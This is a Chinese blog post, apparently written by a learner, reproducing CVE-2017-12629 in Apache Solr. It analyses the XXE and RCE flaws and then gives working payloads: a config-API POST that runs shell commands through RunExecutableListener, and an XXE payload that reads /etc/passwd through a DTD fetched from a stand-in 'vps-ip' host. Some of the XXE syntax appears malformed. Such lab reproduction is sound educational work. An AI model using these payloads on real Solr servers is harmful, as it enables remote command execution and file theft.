CVE-2017-12629:Apache Solr XXE&&RCE

已于 2023-05-13 21:17:50 修改
阅读量1.1k 收藏 3
点赞数 6
分类专栏: CVE漏洞复现 文章标签: solr apache web安全
于 2023-05-13 21:06:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61553520/article/details/130660677
版权

目录

CVE-2017-12629简介

漏洞原理

漏洞复现

RCE复现

XXE复现

前言:作为初学者学习XXE漏洞时,了解到CVE-2017-12629这个漏洞,出于学习原理的目的进行学习。这个漏洞的原理分析有欠缺之处,感觉还有一些细节理解的不是特别好,之后会随着学习的深入,不断修改进度。如果有不对的地方,求轻喷。

CVE-2017-12629简介

pache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。

原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE)。

漏洞影响版本:Apache Solr before 7.1 with Apache Lucene before 7.1

漏洞原理

XXE漏洞:

在/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java文件,通过查看调用栈中的数据处理流程(IDEA中Debug可查看方法调用顺序),在调用lucene xml解析器时确实没有对DTD和外部实体进行禁用处理,造成了Blind XXE。

 在这里卡断点,解析XML时调用的方法。

 一路追踪,得到所有的调用方法

其中没有对DTD和外部实体的过滤。

RCE漏洞:

依据漏洞作者所披露的漏洞细节来看,RCE需要使用到SolrCloud Collections API,所以RCE只影响Solrcloud分布式系统。

RunExecutableListener类中使用了Runtime.getRuntime().exec()方法,可用于在某些特定事件中执行任意命令

使用了config API传入add-listener命令即可调用RunExecutableListener

触发RCE的事件:通过查看代码,能够触发命令执行的事件有两个:postCommit() 和 newSearcher()

  • 使用postCommit时,需要使用update进行collection更新后命令才会执行,因此需要两次进行请求
  • 而使用newSearcher时可直接执行命令

这一点会在下面的漏洞复现有所体现。

漏洞原理总结概括:

  • 触发XXE:调用lucene xml解析器时确实没有对DTD和外部实体进行禁用处理,造成了Blind XXE
  • 触发RCE:config API传入add-listener命令即可调用RunExecutableListener类中的Runtime.getRuntime().exec(),执行命令

漏洞复现

RCE复现

用postCommit要两步,用newSearcher一步即可,所以推荐用newSearcher的方法简单快捷。

通过newSearcher命令执行。一个数据包即可。构造paylaod:
 

POST /solr/demo/config HTTP/1.1
Host: 
Content-Length: 170
Content-Type: application/json

{"add-listener":{"event":"newSearcher","name":"newSearcher3","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}

执行docker-compose exec solr bash进入容器,可见/tmp/success已成功创建

另外一种构造方式参考:Vulhub - Docker-Compose file for vulnerability environment

XXE复现

基于错误回显的XXE利用,就是远程DTD,把信息放在报错信息中返回。

构造1.dtd放在本地

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % ent "<!ENTITY data SYSTEM ':%file;'>">

构造payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY %aaa SYSTEM"http://vps-ip:port/1.dtd">
    <!ENTITY %bbb SYSTEM"file://etc/passwd">
    %aaa;
    %ccc;
    %ddd;
]>

/solr/demo/select?q=<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY %aaa SYSTEM"http://vps-ip:port/1.dtd">
    <!ENTITY %bbb SYSTEM"file://etc/passwd">
    %aaa;
    %ccc;
    %ddd;
]>&wt=xml&defType=xmlparser

URL编码在线:http://www.jsons.cn/urlencode/

Dao-道法自然
关注
专栏目录
[ vulhub漏洞复现篇 ] solr XML外部实体注入(CVE-2017-12629-xxe)
qq_51577576的博客
12-11 865
[ vulhub漏洞复现篇 ] solr XML外部实体注入(CVE-2017-12629-xxe) Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE)。
Apache Solr 远程命令执行漏洞复现(CVE-2017-12629
0xSec
12-26 1039
Solr 是基于 Lucene 的面向企业搜索的 web 应用 ,Solr 是一个独立的企业级搜索应用服务器。它对外提供类似于 Web-service 的 API 接 口。用户可以通过 http 请求,向搜索引擎服务器提交一定格式的 XML 文件,生成索引;也 可以通过 Http Get 操作提出查找请求,并得到 xml/json 格式的返回结果。Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。
Apache Solr 远程命令执行漏洞(CVE-2017-12629
weixin_45022281的博客
10-13 2579
Apache Solr 远程命令执行漏洞(CVE-2017-12629) 漏洞描述: 2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。 风险
solr XML外部实体注入(CVE-2017-12629-xxe)
hackzkaq的博客
12-22 214
一、漏洞编号二、影响范围三、漏洞描述四、环境搭建1、进入CVE-2017-12629环境2、启动CVE-2017-12629环境3、查看CVE-2017-12629环境4、访问CVE-2017-12629环境5、查看CVE-2017-12629漏洞提示信息6、关闭CVE-2017-12629环境五、漏洞复现1、查看core2、Dnslog检测漏洞是否存在1.获取域名2.构造payload并执行3.漏洞存在3、读取/etc/passwd文件1.构造xml文件。
CVE-2017-12629-Apache Solr远程代码执行漏洞分析
最新发布
旺仔Sec&blog
09-20 1229
Apache Solr 是一个流行的开源企业搜索平台,广泛应用于各种企业级应用和网站中。2017 年,该漏洞被发现并公布,引起了广泛关注。 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接
Apache solr XXE 漏洞(CVE-2017-12629
m0_73605862的博客
12-01 933
(排查了端口被占的问题,发现是可以打开目录的,是因为防火墙没关,后面关了就可以了)5.然后要用到另一个服务器上面的dtd文件,所以这里需要用http-server搭建一个服务器,先开放一个端口,然后在共享文件夹里面写入一个1.dtd。3.进入到核心的查看界面,是json的查看方式,第二张的表达方式会更直观,可以看到xxe漏洞在哪里,在那个demo那个地方。2.开始看wp的时候没有看懂为什么是core,然后去了解了一下solr的核心这个概念,然后发现是一个启动的配置。然后就出来了etc/passwd。
cve-2017-12629 apache solr xxe & rce 漏洞分析
whatday的专栏
06-26 2074
Versions Affected Apache Solr before 7.1.0 with Apache Lucene before 7.1 Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Description Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查
Apache solr XML&RCE 漏洞(CVE-2017-12629)
weixin_44047654的博客
02-22 706
Apache Solr XXE & RCE 漏洞(CVE-2017-12629)
[漏洞复现] Apache Solr XXE(CVE-2017-12629)
Vicl1fe的博客
06-10 1370
前言 什么是Lucene Lucene 是一个高效的,基于 Java 的全文检索库。 Lucene 是 apache 软件基金会 4 jakarta 项目组的一个子项目,是一个开放源代码的全 文检索引擎工具包,但它不是一个完整的全文检索引擎,而是一个全文检索引擎的架构, Lucene主要提供了一个简单、强大的应用程序接口。 什么是solr Solr 是基于 Lucene 的面向企业搜索的 web 应用 ,Solr 是一个独立的企业级搜索应用服务器。它对外提供类似于 Web-service 的 API 接 口
Apache solr XML 实体注入漏洞(CVE-2017-12629
weixin_45022281的博客
10-13 683
Apache solr XML 实体注入漏洞(CVE-2017-12629) 漏洞描述: Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629
[漏洞复现] Apache Solr RCE(CVE-2017-12629)
Vicl1fe的博客
06-07 1302
前言 什么是Lucene Lucene 是一个高效的,基于 Java 的全文检索库。 Lucene 是 apache 软件基金会 4 jakarta 项目组的一个子项目,是一个开放源代码的全 文检索引擎工具包,但它不是一个完整的全文检索引擎,而是一个全文检索引擎的架构, Lucene主要提供了一个简单、强大的应用程序接口。 什么是solr Solr 是基于 Lucene 的面向企业搜索的 web 应用 ,Solr 是一个独立的企业级搜索应用服务器。它对外提供类似于 Web-service 的 API 接 口
CVE-2017-12629Apache Solr RCE命令执行漏洞复现
02-16 4656
当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改.apache solr默认继承VelocityResponseWriter插件.Apache solr远程命令执行(CVE-2019-0193).
CVE-2017-12629 xxe漏洞复现
xinyue9966的博客
03-21 1184
一、实验介绍 1.漏洞介绍 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE)。 2.影响版本 Apache Solr before 7.1 with Apache Lucene before 7.1 E
浅浅浅浅谈XXE漏洞(附XXE攻击实例CVE-2017-12629)
SoulCat
03-06 3856
- `山有木兮木有枝,心悦君兮君不知`
Apache solr xxe漏洞复现(CVE-2017-12629
whojoe的博客
07-06 2083
Apache solr xxe漏洞复现(CVE-2017-12629)前言环境搭建漏洞复现参考文章 前言 影响版本 Apache Solr < 7.1 Apache Lucene < 7.1 环境搭建 启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/solr/CVE-2017-12629-X
Apache Solr远程代码执行漏洞(CVE-2017-12629
3569
01-22 5721
http://www.freebuf.com/sectool/159970.html 一 漏洞简介 Apache SolrApache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。 二 漏洞利用 2.1. 环境介绍 Ubuntu14 64位环境(sol
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dao-道法自然

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值